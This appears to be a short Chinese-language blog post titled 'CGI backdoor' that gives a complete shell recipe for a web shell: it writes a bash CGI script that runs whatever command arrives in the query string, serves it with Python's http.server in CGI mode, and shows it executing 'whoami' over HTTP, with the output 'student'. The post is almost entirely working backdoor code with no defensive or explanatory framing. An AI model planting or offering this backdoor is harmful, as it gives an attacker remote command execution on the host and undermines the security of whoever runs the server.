CGI后门

发表于2020-12-10|更新于2021-11-02

|字数总计:65|阅读时长:1分钟|阅读量:|评论数:

cd /tmp
mkdir cgi-bin
echo '#!/bin/bash' > ./cgi-bin/backdoor.cgi
echo 'echo -e "Content-Type: text/plain\n\n"' >> ./cgi-bin/backdoor.cgi
echo 'echo -e $($1)' >> ./cgi-bin/backdoor.cgi
chmod +x ./cgi-bin/backdoor.cgi 
python -m http.server --cgi



wget -q -O -  "http://localhost:8000/cgi-bin/backdoor.cgi?whoami"
student